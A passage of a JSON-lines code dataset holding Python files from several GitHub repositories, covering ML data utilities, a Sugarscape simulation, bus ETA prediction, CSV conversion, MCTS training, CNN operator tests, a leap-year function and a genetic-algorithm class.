img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n\n valid_gen = datagen.flow_from_dataframe(\n dataframe=valid_data,\n directory=train_dir,\n x_col='path',\n y_col='label',\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n \n return train_gen, valid_gen\n \n\ndef oversampling(train_dir, img_size=224, batch_size=32, ratio=1, augment=True):\n \"\"\"\n Oversample the minority class to perform class balancing in the training data. If augment is set to True, the re-added images will first be augmented.\n \n Parameters\n ----------\n train_dir : str\n Path to the training directory.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n ratio : float\n Approximate ratio of the classes after the balancing is performed. Default value: 1.\n augment : bool\n Whether to perform augmentations on the oversampled images.\n \"\"\"\n \n print(f\"Before oversampling, the positive class has { len(os.listdir(os.path.join(train_dir, 'positive'))) } samples\")\n \n source_dir = './sample_pool'\n if os.path.exists(source_dir):\n shutil.rmtree(source_dir)\n shutil.copytree(os.path.join(train_dir, 'positive'), os.path.join(source_dir, 'positive'))\n\n if augment:\n datagen = ImageDataGenerator(\n #Choose data augmentation parameters\n rotation_range=10,\n width_shift_range=0.03,\n height_shift_range=0.05,\n horizontal_flip=False,\n brightness_range=(0.9, 1.1),\n zoom_range=(0.9, 1.1),\n fill_mode='constant',\n cval=0.\n )\n else:\n datagen = ImageDataGenerator()\n \n oversampler = datagen.flow_from_directory(\n directory=source_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n save_to_dir=os.path.join(train_dir, 'positive'),\n save_prefix='new_',\n color_mode='rgb',\n shuffle=True,\n seed=111\n )\n\n negative_cnt = len(os.listdir(os.path.join(train_dir, 'negative')))\n while len(os.listdir(os.path.join(train_dir, 'positive'))) < (negative_cnt / ratio):\n oversampler.next()\n\n print(f\"After oversampling the positive class, it now contains {len(os.listdir(os.path.join(train_dir, 'positive')))} samples\")\n\n\n@tf.function\ndef f1_metric(y_true, y_pred):\n \"\"\"\n Function to calculate the F1 metric during continuous training of a TensorFlow model.\n Original source: # https://datascience.stackexchange.com/a/48251\n \n Parameters\n ----------\n y_true : NumPy.ndarray\n Ground truth labels of the evaluated batch.\n y_pred : NumPy.ndarray\n Predicted class of the evaluated batch.\n \n Returns\n -------\n f1_val : float\n F1 score for the positive class.\n \"\"\"\n \n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n recall = true_positives / (possible_positives + K.epsilon())\n f1_val = 2*(precision*recall)/(precision+recall+K.epsilon())\n return f1_val","repo_name":"chododom/COVID-19-Detection","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"70268190921","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport thinkplot\nfrom Cell2D import Cell2D, Cell2DViewer\nfrom SugarAgent import Agent\nfrom thinkstats2 import Cdf\nfrom thinkstats2 import RandomSeed\n\n\ndef make_locs(n, m):\n \"\"\"Makes array where each row is an index in an `n` by `m` grid.\n\n n: int number of rows\n m: int number of cols\n\n returns: NumPy array\n \"\"\"\n t = [(i, j) for i in range(n) for j in range(m)]\n return np.array(t)\n\n\ndef make_visible_locs(vision):\n \"\"\"Computes the kernel of visible cells.\n\n vision: int distance\n \"\"\"\n\n def make_array(d):\n \"\"\"Generates visible cells with increasing distance.\"\"\"\n a = np.array([[-d, 0], [d, 0], [0, -d], [0, d]])\n np.random.shuffle(a)\n return a\n\n arrays = [make_array(d) for d in range(1, vision + 1)]\n return np.vstack(arrays)\n\n\ndef distances_from(n, i, j):\n \"\"\"Computes an array of distances.\n\n n: size of the array\n i, j: coordinates to find distance from\n\n returns: array of float\n \"\"\"\n X, Y = np.indices((n, n))\n return np.hypot(X - i, Y - j)\n\n\nclass Sugarscape(Cell2D):\n \"\"\"Represents an Epstein-Axtell Sugarscape.\"\"\"\n\n def __init__(self, n, **params):\n \"\"\"Initializes the attributes.\n\n n: number of rows and columns\n params: dictionary of parameters\n \"\"\"\n self.n = n\n self.params = params\n\n # track variables\n self.agent_count_seq = []\n\n # make the capacity array\n self.capacity = self.make_capacity()\n\n # initially all cells are at capacity\n self.array = self.capacity.copy()\n\n # make the agents\n self.make_agents()\n\n def make_capacity(self):\n \"\"\"Makes the capacity array.\"\"\"\n\n # compute the distance of each cell from the peaks.\n dist1 = distances_from(self.n, 15, 15)\n dist2 = distances_from(self.n, 35, 35)\n dist = np.minimum(dist1, dist2)\n\n # cells in the capacity array are set according to dist from peak\n bins = [21, 16, 11, 6]\n a = np.digitize(dist, bins)\n return a\n\n def make_agents(self):\n \"\"\"Makes the agents.\"\"\"\n\n # determine where the agents start and generate locations\n n, m = self.params.get('starting_box', self.array.shape)\n locs = make_locs(n, m)\n np.random.shuffle(locs)\n\n # make the agents\n num_agents = self.params.get('num_agents', 400)\n assert (num_agents <= len(locs))\n self.agents = [Agent(locs[i], self.params)\n for i in range(num_agents)]\n\n # keep track of which cells are occupied\n self.occupied = set(agent.loc for agent in self.agents)\n\n def grow(self):\n \"\"\"Adds sugar to all cells and caps them by capacity.\"\"\"\n grow_rate = self.params.get('grow_rate', 1)\n self.array = np.minimum(self.array + grow_rate, self.capacity)\n\n def look_and_move(self, center, vision):\n \"\"\"Finds the visible cell with the most sugar.\n\n center: tuple, coordinates of the center cell\n vision: int, maximum visible distance\n\n returns: tuple, coordinates of best cell\n \"\"\"\n # find all visible cells\n locs = make_visible_locs(vision)\n locs = (locs + center) % self.n\n\n # convert rows of the array to tuples\n locs = [tuple(loc) for loc in locs]\n\n # select unoccupied cells\n empty_locs = [loc for loc in locs if loc not in self.occupied]\n\n # if all visible cells are occupied, stay put\n if len(empty_locs) == 0:\n return center\n\n # look up the sugar level in each cell\n t = [self.array[loc] for loc in empty_locs]\n\n # find the best one and return it\n # (in case of tie, argmax returns the first, which\n # is the closest)\n i = np.argmax(t)\n return empty_locs[i]\n\n def harvest(self, loc):\n \"\"\"Removes and returns the sugar from `loc`.\n\n loc: tuple coordinates\n \"\"\"\n sugar = self.array[loc]\n self.array[loc] = 0\n return sugar\n\n def step(self):\n \"\"\"Executes one time step.\"\"\"\n replace = self.params.get('replace', False)\n\n # loop through the agents in random order\n random_order = np.random.permutation(self.agents)\n for agent in random_order:\n\n # mark the current cell unoccupied\n self.occupied.remove(agent.loc)\n\n # execute one step\n agent.step(self)\n\n # if the agent is dead, remove from the list\n if agent.is_starving() or agent.is_old():\n self.agents.remove(agent)\n if replace:\n self.add_agent()\n else:\n # otherwise mark its cell occupied\n self.occupied.add(agent.loc)\n\n # update the time series\n self.agent_count_seq.append(len(self.agents))\n\n # grow back some sugar\n self.grow()\n return len(self.agents)\n\n def add_agent(self):\n \"\"\"Generates a new random agent.\n\n returns: new Agent\n \"\"\"\n new_agent = Agent(self.random_loc(), self.params)\n self.agents.append(new_agent)\n self.occupied.add(new_agent.loc)\n return new_agent\n\n def random_loc(self):\n \"\"\"Choose a random unoccupied cell.\n\n returns: tuple coordinates\n \"\"\"\n while True:\n loc = tuple(np.random.randint(self.n, size=2))\n if loc not in self.occupied:\n return loc\n\n\nclass SugarscapeViewer(Cell2DViewer):\n \"\"\"Generates visualization and animation of Sugarscape.\"\"\"\n\n cmap = plt.get_cmap('YlOrRd')\n\n options = dict(interpolation='none', alpha=0.8,\n vmin=0, vmax=9)\n\n def draw(self, grid=False):\n \"\"\"Draws the array and any other elements.\n\n grid: boolean, whether to draw grid lines\n \"\"\"\n self.draw_array(self.viewee.array, origin='lower')\n self.draw_agents()\n\n def draw_agents(self):\n \"\"\"Plots the agents.\n \"\"\"\n xs, ys = self.get_coords()\n self.points = plt.plot(xs, ys, '.', color='red')[0]\n\n def animate_func(self, i):\n \"\"\"Draws one frame of the animation.\"\"\"\n Cell2DViewer.animate_func(self, i)\n xs, ys = self.get_coords()\n self.points.set_data(np.array([xs, ys]))\n return self.im, self.points\n\n def get_coords(self):\n \"\"\"Gets the coordinates of the agents.\n\n Transforms from (row, col) to (x, y).\n\n returns: tuple of sequences, (xs, ys)\n \"\"\"\n agents = self.viewee.agents\n rows, cols = np.transpose([agent.loc for agent in agents])\n xs = cols + 0.5\n ys = rows + 0.5\n return xs, ys\n\n\nif __name__ == '__main__':\n # a = make_locs(2, 3)\n # b = make_visible_locs(2)\n # c = distances_from(5, 2, 2)\n\n env = Sugarscape(50, num_agents=1500)\n viewer = SugarscapeViewer(env)\n # anim = viewer.animate(frames=2, interval=10)\n anim = viewer.animate(frames=2)\n plt.show()\n\n # # # First implementation\n #\n # cdf = Cdf(agent.vision for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Vision', ylabel='CDF')\n #\n # cdf = Cdf(agent.metabolism for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Metabolism', ylabel='CDF')\n #\n # cdf = Cdf(agent.sugar for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Sugar', ylabel='CDF')\n #\n # env.step()\n # # viewer = SugarscapeViewer(env)\n # viewer.draw()\n\n # anim = viewer.animate(frames=500)\n # plt.show()\n\n # # # Second implementation\n # RandomSeed(17)\n #\n # env = Sugarscape(50, num_agents=400)\n # viewer = SugarscapeViewer(env)\n #\n # thinkplot.preplot(cols=3)\n # viewer.draw()\n #\n # thinkplot.subplot(2)\n # for i in range(2):\n # viewer.step()\n # viewer.draw()\n #\n # thinkplot.subplot(3)\n # for i in range(98):\n # viewer.step()\n # viewer.draw()\n #\n # thinkplot.tight_layout()\n # thinkplot.save('chap09-3')\n","repo_name":"BAFurtado/Python4ABMIpea2019","sub_path":"Sugarscape.py","file_name":"Sugarscape.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40151205347","text":"# @Time : 2017/10/24 16:19\n# @Author : Jalin Hu\n# @File : note.py\n# @Software: PyCharm\nimport matplotlib.pyplot as plt\nimport math\nx = []\ny = []\nfor i in range(-20, 21):\n x.append(i)\nf = lambda x: 1 / (1 + math.e ** (-2 * x))\nfor i in map(f, x):\n print(i)\n y.append(i)\nplt.figure()\nplt.plot(x, y)\nplt.show()\n","repo_name":"smallsmallcase/Logistic_regression","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21201624087","text":"# Standard library imports\nimport sys, os\nsys.path.append(os.path.abspath('../../configuration'))\nimport pickle\n# Third party imports\nimport sklearn\nimport sklearn.ensemble\n# Local imports\nimport routeInfo as ri\nimport preprocess as pre\nimport getData as gd\n\ndef applyModel(data: list, route: str, model: str) -> int:\n \"\"\"\n :param: data, route, model (ml)\n :return: Predicted ETA for specific vehicle\n :usage: Generate a prediction from the chosen ml model\n\t\"\"\"\n model = pickle.load(open(f'src/models/{route}/{model}', 'rb'))\n prediction = model.predict(data)\n return int(prediction[0])\n\ndef generatePrediction(routes: list = None, model: str = None) -> dict:\n \"\"\"\n :param: routes, model (ml)\n :return: JSON of releveant information\n :usage: Generate and list all predictions to be returned by the api\n Return schema: {routeID: {busID: [prediction, nextStop], busID: [prediction, nextStop]}, routeID: {busID: [prediction, nextStop], busID: [prediction, nextStop]}}\n \"\"\"\n predictions = {}\n if routes:\n temp = []\n for key, value in ri.allRoutes.items():\n if value == routes:\n print(key)\n temp.append(key)\n routes = temp\n del temp\n else:\n routes = ri.chosenRoutes\n for route in routes:\n busPredictions = {}\n vehicles = gd.getVehicleData(route)\n for vehicleData in vehicles:\n nextStop = vehicleData[4]\n latitude = vehicleData[5]\n longitude = vehicleData[6]\n trafficData = gd.getTrafficData(latitude, longitude)\n weatherData = gd.getWeatherData(latitude, longitude)\n distanceData = gd.getDistance(route, nextStop, latitude, longitude)\n raw = vehicleData + trafficData + weatherData + distanceData\n processedData = [pre.processData(raw)]\n busPredictions[vehicleData[1]] = [applyModel(processedData, ri.allRoutes[route], model), ri.routeMap[route][nextStop]['name']]\n predictions[ri.allRoutes[route]] = busPredictions\n return predictions\n\ndef returnRaw(routes: list = None) -> dict:\n \"\"\"\n :param: routes\n :return: JSON of raw data used to train and generate predictions\n :usage: Return complied data\n Return schema: {routeID: {busID: [data], busID: [data]}, routeID: {busID: [data], {busID: [data]}}}\n data = ['Time', 'Call_name', 'Speed', 'Passenger_load', 'Next_stop', 'Latitude', 'Longitude', 'Heading', 'Traffic_speed', 'Temperature', 'Windspeed', 'Precipitation', 'Humidity', 'Visibility', 'Stop_distance']\n \"\"\"\n rawData = {}\n if routes:\n temp = []\n for key, value in ri.allRoutes.items():\n if value in routes:\n temp.append(key)\n routes = temp\n del temp\n else:\n routes = ri.chosenRoutes\n for route in routes:\n temp = {}\n vehicles = gd.getVehicleData(route)\n for vehicleData in vehicles:\n nextStop = vehicleData[4]\n latitude = vehicleData[5]\n longitude = vehicleData[6]\n trafficData = gd.getTrafficData(latitude, longitude)\n weatherData = gd.getWeatherData(latitude, longitude)\n distanceData = gd.getDistance(route, nextStop, latitude, longitude)\n raw = vehicleData + trafficData + weatherData + distanceData\n temp[vehicleData[1]] = raw\n rawData[ri.allRoutes[route]] = temp\n return rawData\n","repo_name":"brandonliau/RuTransloc","sub_path":"src/tools/apiSupport.py","file_name":"apiSupport.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31566834153","text":"import sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nv = int(input())\r\nvortex = [[] for _ in range(v + 1)]\r\nvs = [True] * (v + 1)\r\n\r\nfor i in range(1, v + 1):\r\n connect = list(map(int, input().split()))\r\n index = i\r\n j = 1\r\n while connect[j] > 0:\r\n a, b = connect[j], connect[j + 1]\r\n vortex[index].append((a, b))\r\n vs[a] = False\r\n j += 2\r\n\r\n\r\ndef dfs(start):\r\n stack = deque([(start, 0)])\r\n visited = [False] * (v + 1)\r\n \r\n","repo_name":"JCH1410/BOJ","sub_path":"1167_G2_temp.py","file_name":"1167_G2_temp.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70275278920","text":"\"\"\"Usage: convert_data.py\n\nConvert downloaded csv data to the correctly readable data\n\nOptions:\n -h, --help show this help message and exit\n\"\"\"\nimport os\nimport json\nimport csv\nfrom stringutil import StringUtil\n\nfrom natsort import natsorted\n\nfrom converter import Processor, FILETYPE\n\n\ndef delete_total_csvs(outdir: str):\n \"\"\"delete csv files in the outdir\n\n Args:\n outdir (str): the dir that have target csv files\n \"\"\"\n for filetype in FILETYPE:\n filename = \"{0}/{1}.csv\".format(outdir, filetype.value)\n if (os.path.exists(filename)):\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n RAW_DIR = './data/raw'\n OUT_DIR = './data/out'\n # DATA FILE\n DATA_FILE = \"./data/loaded_files.json\"\n\n # If data file does not exist, finish process\n if (not os.path.exists(DATA_FILE)):\n print(\n 'Error: data file {0} does not extst. Run download.py first'\n .format(DATA_FILE))\n exit(1)\n\n # load data file\n with open(DATA_FILE) as f:\n loaded: dict = json.load(f)\n\n # create dir if it does not exist\n if (not os.path.exists(OUT_DIR)):\n os.makedirs(OUT_DIR)\n\n # delete total files\n delete_total_csvs(OUT_DIR + \"/total\")\n\n # load csv data\n for key in loaded.keys():\n date = StringUtil.extract_date_from_title(loaded.get(key))\n if (not date):\n print('The system could not retrieve date string from the title \"{0}\" '\n .format(\n loaded.get(key)))\n continue\n ymd = date.strftime('%Y%m%d')\n processor = Processor(date) # create processor instance\n print('Create file for the date {0}'.format(date))\n target_dir = RAW_DIR + '/' + key\n print('Scan {0}'.format(target_dir))\n if (not os.path.exists(target_dir)):\n print(\n 'The data for the key {0} does not exists. Skip this key'\n .format(key))\n continue\n\n # read all csv file of the raw data\n for csvfile in natsorted(os.listdir(target_dir)):\n l: list = []\n with open(target_dir + '/' + csvfile) as f:\n reader = csv.reader(f)\n for row in reader:\n l.append(list(map(StringUtil.to_number, row)))\n processor.appendData(l)\n # save extended data\n if (key == list(loaded.keys())[-1]):\n # last file data as latest data\n print('save CSVs to {0}'.format(OUT_DIR + \"/\" + \"latest\"))\n processor.saveFiles(OUT_DIR + \"/\" + \"latest\")\n else:\n print('save CSVs to {0}'.format(OUT_DIR + \"/\" + ymd))\n processor.saveFiles(OUT_DIR + \"/\" + ymd)\n","repo_name":"codeforjapan/mynumbercard_statistics","sub_path":"mynumbercard_data/convert_data.py","file_name":"convert_data.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"63"} +{"seq_id":"37473014288","text":"import random\nimport resource\nfrom typing import Any, List, Tuple\n\nimport numpy as np\nimport torch\nfrom torch.multiprocessing import Pool\n\nfrom engine.landshark_game import GameState\nfrom search.mcts import MCTS\n\nnp.random.seed(1)\ntorch.manual_seed(1)\n\ntorch.multiprocessing.set_sharing_strategy(\"file_system\")\n\n\nclass Policy(torch.nn.Module):\n def __init__(self, feature_dim: int, action_dim: int, num_players: int):\n super().__init__()\n self.feature_dim = feature_dim\n self.action_dim = action_dim\n self.num_players = num_players\n self.shared = torch.nn.ModuleList(\n [\n torch.nn.BatchNorm1d(feature_dim),\n (torch.nn.Linear(feature_dim, 128)),\n torch.nn.LeakyReLU(),\n torch.nn.BatchNorm1d(128),\n (torch.nn.Linear(128, 64)),\n torch.nn.LeakyReLU(),\n torch.nn.BatchNorm1d(64),\n ]\n )\n\n self.critic = torch.nn.ModuleList(\n [torch.nn.Linear(64, num_players), torch.nn.Softmax(dim=1)]\n )\n\n self.actor = torch.nn.ModuleList(\n [torch.nn.Linear(64, action_dim), torch.nn.Softmax(dim=1)]\n )\n\n self.critic_criterion = torch.nn.NLLLoss()\n\n self.optimizer = torch.optim.Adam(\n list(self.shared.parameters())\n + list(self.critic.parameters())\n + list(self.actor.parameters()),\n lr=0.001,\n )\n\n def forward(self, features: torch.Tensor):\n x = features\n for m in self.shared:\n x = m(x)\n head = x\n for m in self.critic:\n x = m(x)\n critic_output = x\n x = head\n for m in self.actor:\n x = m(x)\n actor_output = x\n return critic_output, actor_output\n\n def fit(self, features, payoffs, probabilities):\n previous_loss = None\n stale_count = 0\n for x in range(100000):\n self.optimizer.zero_grad()\n critic_output, actor_output = self(features.detach())\n\n critic_loss = self.critic_criterion(\n torch.log(critic_output.clamp(min=1e-3)), payoffs.flatten()\n )\n actor_loss = (\n -(probabilities * torch.log(actor_output.clamp(min=1e-3)))\n .sum(dim=1)\n .mean()\n )\n print(actor_output)\n print(probabilities)\n\n total_loss = critic_loss + actor_loss\n if x % 1 == 0:\n print(\n f\"Critic: {critic_loss} Actor: {actor_loss} Total Loss: {total_loss} Previous loss: {previous_loss}\"\n )\n assert torch.isnan(actor_loss).sum() == 0\n assert torch.isnan(critic_loss).sum() == 0\n total_loss.backward()\n if x > 0 and total_loss + 1e-4 > previous_loss:\n stale_count += 1\n if stale_count >= 3:\n break\n else:\n stale_count = 0\n previous_loss = float(total_loss)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n\ndef one_mcts(game, policy):\n np.random.seed(random.SystemRandom().randint(0, 1000000))\n torch.manual_seed(random.SystemRandom().randint(0, 1000000))\n features = []\n payoffs = []\n probabilities = []\n mcts = MCTS(policy)\n game.reset()\n\n partial_training_examples = []\n episodeStep = 0\n\n with torch.no_grad():\n while True:\n episodeStep += 1\n\n # game.print()\n if game.get_player_to_act() == 0 and False:\n print(\"Possible Actions: \" + str(game.getPossibleActions()))\n action_str = input(\n \"Please give an action for seat \"\n + str(game.get_player_to_act())\n + \": \"\n )\n action = int(action_str)\n game.playerAction(game.get_player_to_act(), action)\n else:\n pi = mcts.getActionProb(game, num_sims=1000, temp=1)\n game_features = torch.zeros(game.feature_dim())\n game.populate_features(game_features)\n partial_training_examples.append(\n [game_features, game.get_player_to_act(), pi, None]\n )\n\n action = np.random.choice(len(pi), p=pi)\n board = game.act(game.get_player_to_act(), action)\n\n if game.terminal():\n game_payoffs = game.payoffs()\n game_payoffs = (game_payoffs == int(game_payoffs.max().item())).long()\n for pte in partial_training_examples:\n features.append(pte[0])\n ego_centric_payoffs = torch.roll(game_payoffs, pte[1], dims=[0])\n winner_index = torch.nonzero(ego_centric_payoffs, as_tuple=False)[0]\n payoffs.append(winner_index)\n probabilities.append(torch.tensor(pte[2]))\n # print(payoffs)\n # print(probabilities)\n break\n return (features, payoffs, probabilities)\n\n\ngame = GameState(4)\nfeatures = []\npayoffs = []\nprobabilities = []\npolicy = None\nstep = 128\nmilestone = step\nmcts_pool = Pool(32)\nfor x in range(100):\n results: List[Tuple[Any, Any, Any]] = mcts_pool.starmap(\n one_mcts, [(game, policy)] * 64\n )\n # f, pa, pr = one_mcts(game, policy)\n for f, pa, pr in results:\n features.extend(f)\n payoffs.extend(pa)\n probabilities.extend(pr)\n\n while len(features) >= milestone:\n milestone += step\n if policy is None:\n policy = Policy(game.feature_dim(), game.action_dim(), game.num_players)\n policy.eval()\n policy.train()\n policy.fit(\n torch.stack(features), torch.stack(payoffs), torch.stack(probabilities)\n )\n features.clear()\n payoffs.clear()\n probabilities.clear()\n policy.eval()\n torch.save(policy, \"MCTS_AC.torch\")\n","repo_name":"MisterTea/LandsharkGame","sub_path":"backend/search/test_mcts_landshark.py","file_name":"test_mcts_landshark.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"21375094121","text":"import cnn_operator as cnn_opt\r\nimport torch\r\nimport torchvision as tv\r\nimport torch.nn as nn\r\n\r\nimport math\r\nimport numpy as np\r\nimport os,sys\r\nif __name__ == '__main__':\r\n\r\n# #CONV operator\r\n# conv_fm_in_shape = [1, 11 ,176, 176] #输入特征图 ====shape为 [ batch, in_height, in_weight, in_channel ]===\r\n# conv_kernel_shape = [10, 11, 5, 5] #卷积核参数 ====shape为 [ out_channels,in_channel, filter_height, filter_weight]==\r\n# conv_stride_info = [1, 1, 7, 7] #步进参数 ====shape为 [ 1, 1, row_strides, col_strides]\r\n# conv_dilation_info = [1, 1, 3, 3]\r\n# conv_padding_info = [13,13]\r\n# # cnn_opt.cnn_operator_conv(conv_fm_in_shape,conv_kernel_shape,conv_stride_info,conv_dilation_info,conv_padding_info)\r\n#\r\n# act_fm_in_shape = [1, 3, 256, 256, ] # 输入特征图 ====shape为 [ batch, in_channel, in_height, in_weight]===\r\n# act_prelu_para_init= np.float32(0.28)\r\n# # act_prelu_para_init= torch.double(0.28) #.float64(0.28)\r\n# act_layer_leakyrelu_para= np.float32(1e-2)\r\n# fm_in = (torch.randn(tuple(act_fm_in_shape))*6)\r\n#\r\n# act_layer_relu = nn.ReLU(inplace=False)\r\n# act_layer_prelu = nn.PReLU(act_fm_in_shape[1], act_prelu_para_init) # a参数可学习 max(0,x) + a * min(0,x)\r\n# act_layer_leakyrelu = nn.LeakyReLU(act_layer_leakyrelu_para, inplace=False)\r\n# act_layer_relu6 = nn.ReLU6(inplace=False)\r\n# act_layer_sigmoid = nn.Sigmoid() # 1 / ( 1 + e^{-x}\r\n# act_layer_Tanh = nn.Tanh()\r\n#\r\n# fm_out_relu = act_layer_relu.forward(fm_in)\r\n# fm_out_prelu = act_layer_prelu.forward(fm_in)\r\n# fm_out_leakyrelu = act_layer_leakyrelu.forward(fm_in)\r\n# fm_out_relu6 = act_layer_relu6.forward(fm_in)\r\n# fm_out_sigmoid = act_layer_sigmoid.forward(fm_in)\r\n# fm_out_Tanh = act_layer_Tanh.forward(fm_in)\r\n#\r\n# dir = 'inout'\r\n# if not os.path.exists(dir):\r\n# os.mkdir(dir)\r\n#\r\n# np.savetxt(dir + '/act_fm_in.txt' , fm_in.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_relu.txt' , fm_out_relu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_prelu.txt' , fm_out_prelu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_leakyrelu.txt' , fm_out_leakyrelu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_relu6.txt' , fm_out_relu6.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_sigmoid.txt' , fm_out_sigmoid.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_Tanh.txt' , fm_out_Tanh.detach().numpy().reshape(-1, 1))\r\n#\r\n# print(\"==================================================\")\r\n# print(\"=the ACT process done DB have saved in the file=\")\r\n# print(\"==================================================\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#POOL operator\r\n pool_mode = \"AVG\"\r\n pool_fm_in_shape = [1, 3, 256, 256, ] # 输入特征图 ====shape为 [ batch, in_channel, in_height, in_weight]===\r\n pool_kernel_info = [1, 1, 2, 2]\r\n pool_stride_info = [1, 1, 7, 7]\r\n pool_dilation_info = [1, 1, 3, 3]\r\n pool_padding_info = [1, 1]\r\n # cnn_opt.cnn_operator_pool(pool_fm_in_shape,pool_kernel_info,pool_stride_info,pool_dilation_info,pool_padding_info,pool_mode)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# FC operator\r\n batch_size = 10\r\n fm_in_node_num = 20\r\n fm_out_node_num = 30\r\n # cnn_opt.cnn_operator_fc(batch_size, fm_in_node_num, fm_out_node_num)\r\n\r\n# Batch-Normlize operator\r\n# fm_in = np.array(np.arange(1,101,1),dtype='d')\r\n\r\n BN_fm_in_shape = [10,3, 64, 64]\r\n num_feature = BN_fm_in_shape[1]\r\n fm_in = np.array(np.random.randn(BN_fm_in_shape[0],BN_fm_in_shape[1],BN_fm_in_shape[2],BN_fm_in_shape[3]), dtype='d')\r\n # fm_in_tmp = fm_in.reshape((BN_fm_in_shape[0],BN_fm_in_shape[1],BN_fm_in_shape[2],BN_fm_in_shape[3]))\r\n BN_fm_in = torch.from_numpy(fm_in)\r\n # BN_fm_in_shape = [16, 3, 32, 32] #输入特征图 ====shape为 [ batch, in_height, in_weight, in_channel ]===\r\n\r\n ##== Without Learnable Parameters\r\n gamma = np.float64(1)\r\n beta = np.float64(0)\r\n eps = np.float64(0)\r\n momentum = np.float64(1)\r\n BN_layer = nn.BatchNorm2d(num_feature,eps=eps,momentum=momentum,affine=False)\r\n BN_layer.running_mean.data=BN_layer.running_mean.data.to(torch.float64) #torch dataformat change\r\n BN_layer.running_var.data =BN_layer.running_var.data.to(torch.float64)\r\n BN_fm_out= BN_layer.forward(BN_fm_in)\r\n\r\n for i in range(0,BN_layer.running_mean.data.shape[0]):\r\n print('batch_mean: {:.10} batch var: {:.20f}'.format(BN_layer.running_mean.data[i], BN_layer.running_var.data[i]))\r\n#torch2numpy\r\n fm_in_np = BN_fm_in.detach().numpy()\r\n fm_out_np = BN_fm_out.detach().numpy()\r\n\r\n mean_0 = BN_layer.running_mean.data[0]\r\n var_0 = BN_layer.running_var.data[0]\r\n fm_out_0000=(fm_in_np[0,0,0,0]-mean_0)/(np.sqrt(var_0)+eps)*gamma+beta\r\n print('fm_out0000 var: {:.20f}'.format(fm_out_0000))\r\n#文件保存\r\n dir = 'inout'\r\n if not os.path.exists(dir):\r\n os.mkdir(dir)\r\n\r\n np.savetxt(dir + '/BN_fm_in.txt' , BN_fm_in.reshape(-1, 1))\r\n np.savetxt(dir + '/BN_fm_out.txt', BN_fm_out.reshape(-1, 1))\r\n\r\n print(\"==================================================\")\r\n print(\"=the BN process done DB have saved in the file=\")\r\n print(\"==================================================\")\r\n","repo_name":"richkoala/cnn-operator","sub_path":"cnn-code/pytorch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25237420245","text":"\"\"\"\n Simple function to calculate whether it is a leap year or not.\n\"\"\"\n\n\ndef is_leap_year(year=None):\n \"\"\"\n Simple function to calculate whether it is a leap year or not.\n\n A leap year in the Gregorian calendar occurs:\n - on every year that is evenly divisible by 4\n - except every year that is evenly divisible by 100\n - unless the year is also evenly divisible by 400\n \"\"\"\n if year is None or not isinstance(year, int):\n return 0\n\n leap_year = False\n if year % 4 == 0:\n leap_year = True\n if year % 100 == 0:\n leap_year = False\n if year % 400 == 0:\n leap_year = True\n\n return leap_year\n","repo_name":"martsa1/exersism-exercises","sub_path":"python/leap/leap.py","file_name":"leap.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22358883452","text":"from random import shuffle\nimport random\nimport sys\nimport operator\nimport time\n\nclass Cromossomo:\n\n\tdef __init__(self, tam):\n\t\tself._data = list(range(tam))\n\t\tself._taxaMutacao = random.random()\n\t\tshuffle(self._data)\n\n\tdef getGene(self, idx):\n\t\treturn self._data[idx]\n\n\tdef setData(self, data):\n\t\tself._data = data\n\n\tdef setTaxaMutacao(self, taxaMutacao):\n\t\tself._taxaMutacao = taxaMutacao\n\n\tdef 